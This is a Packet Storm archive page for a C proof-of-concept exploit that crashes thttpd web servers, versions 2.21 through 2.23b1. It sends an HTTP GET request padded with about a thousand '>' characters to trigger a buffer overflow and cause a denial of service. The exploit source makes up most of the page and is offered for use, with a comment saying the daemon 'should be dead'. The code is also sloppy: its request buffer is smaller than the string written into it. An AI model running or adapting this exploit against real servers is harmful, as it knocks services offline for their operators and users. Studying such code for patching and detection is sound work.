exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

thttpd-sontot.c

thttpd-sontot.c
Posted Dec 15, 2003
Authored by decka_trash

Thttpd v2.21 through 2.23b1 remote denial of service buffer overflow exploit. Tested against FreeBSD, SunOS 4, Solaris 2, BSD/OS, Linux, and OSF.

tags | exploit, remote, denial of service, overflow
systems | linux, solaris, freebsd, bsd
SHA-256 | 38d094daad04305c09883e203114d57290f80d0373787893a50500e94e4263e9

thttpd-sontot.c

Change Mirror Download
==========================[ thttpd-sontot.c ]=========================

// thttpd-sontot.c remote dos exploit by d3ck4
// Base On Texonet Security Advisory 20030908
// Application : thttpd
// Version(s) : 2.21 - 2.23b1
// Platforms : FreeBSD, SunOS 4, Solaris 2, BSD/OS, Linux, OSF
// Solution : Upgrade to version 2.24
// Remote exploit not yet ;P~

#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

int main(int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *host;
char buffer[1000];
char buffer1[1130];
int s, i;
if(argc != 3)
{
fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);
exit(0);
}
s = socket(AF_INET, SOCK_STREAM, 0);
if(s == -1)
{
perror("socket() failed\n");
exit(0);
}
host = gethostbyname(argv[1]);
if( host == NULL)
{
herror("gethostbyname() failed");
exit(0);
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(atol(argv[2]));

if(connect(s, &addr, sizeof(addr)) == -1)
{
perror("couldn't connect to server\n");
exit(0);
}

for(i = 0; i < 1000 ; i++)
buffer1[i] = '>';
sprintf(buffer, "GET /%s HTTP/1.0\r\n\r\n\r\n", buffer1);
printf("\n(Drink Tongkat-Ali For Better Performance ;P~ !)\n\n");
printf("Buffer is: %s\n\n", buffer1);
printf("Buffer filled... now sending buffer\n");
send(s, buffer, strlen(buffer), 0);

printf("Buffer sent.\nNow thttpd daemon should be dead !!!\n\n");
close(s);
return 0;
}

/* EOF */

==========================[ thttpd-sontot.c ]=========================


---------------------------------
Do you Yahoo!?
Free Pop-Up Blocker - Get it now
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close